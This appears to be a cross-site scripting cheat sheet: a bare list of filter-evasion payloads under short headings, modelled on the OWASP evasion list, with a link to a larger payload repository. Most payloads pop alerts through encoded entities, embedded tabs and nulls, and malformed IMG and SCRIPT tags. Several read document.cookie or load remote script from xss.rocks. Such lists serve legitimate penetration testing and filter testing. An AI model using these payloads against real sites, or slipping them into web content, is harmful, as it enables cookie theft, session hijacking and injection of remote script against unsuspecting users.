<img src=x onerror="alert('xss')">
<script>alert(1)</script>

https://github.com/payloadbox/xss-payload-list <--- Hundered billion payloads

Basic XSS Test Without Filter Evasion

• <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

XSS Locator (Polygot)

• javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

Image XSS Using the JavaScript Directive

• <IMG SRC="javascript:alert('XSS');">

No Quotes and no Semicolon

• <IMG SRC=javascript:alert('XSS')>

Case Insensitive XSS Attack Vector

• <IMG SRC=JaVaScRiPt:alert('XSS')>

HTML Entities

• <IMG SRC=javascript:alert(&quot;XSS&quot;)>

Grave Accent Obfuscation
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

Malformed A Tags

• \<a onmouseover="alert(document.cookie)"\>xxs link\</a\>

• \<a onmouseover=alert(document.cookie)\>xxs link\</a\>

Malformed IMG Tags

• <IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>

fromCharCode
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>


Default SRC Tag to Get Past Filters that Check SRC Domain

• <IMG SRC=# onmouseover="alert('xxs')">

Default SRC Tag by Leaving it Empty

• <IMG SRC= onmouseover="alert('xxs')">

Default SRC Tag by Leaving it out Entirely

• <IMG onmouseover="alert('xxs')">

On Error Alert

• <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

IMG onerror and JavaScript Alert Encode

• <img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

Decimal HTML Character References

• <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

Decimal HTML Character References Without Trailing Semicolons

• <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

Hexadecimal HTML Character References Without Trailing Semicolons

• <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

Embedded Tab

• <IMG SRC="jav ascript:alert('XSS');">

Embedded Encoded Tab

• <IMG SRC="jav&#x09;ascript:alert('XSS');">

Embedded Newline to Break-up XSS

• <IMG SRC="jav&#x0A;ascript:alert('XSS');">

Embedded Carriage Return to Break-up XSS

• <IMG SRC="jav&#x0D;ascript:alert('XSS');">

Null breaks up JavaScript Directive

• perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

Spaces and Meta Chars Before the JavaScript in Images for XSS

• <IMG SRC=" &#14; javascript:alert('XSS');">

Non-alpha-non-digit XSS

• <SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>

• <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

• <SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>

Extraneous Open Brackets

• <<SCRIPT>alert("XSS");//\<</SCRIPT>

No Closing Script Tags

• <SCRIPT SRC=http://xss.rocks/xss.js?< B >

Protocol Resolution in Script Tags

• <SCRIPT SRC=//xss.rocks/.j>

Half Open HTML/JavaScript XSS Vector

• <IMG SRC="`('XSS')"`

Double Open Angle Brackets

• <iframe src=http://xss.rocks/scriptlet.html <

Escaping JavaScript Escapes

• \";alert('XSS');//

• </script><script>alert('XSS');</script>

End Title Tag

• </TITLE><SCRIPT>alert("XSS");</SCRIPT>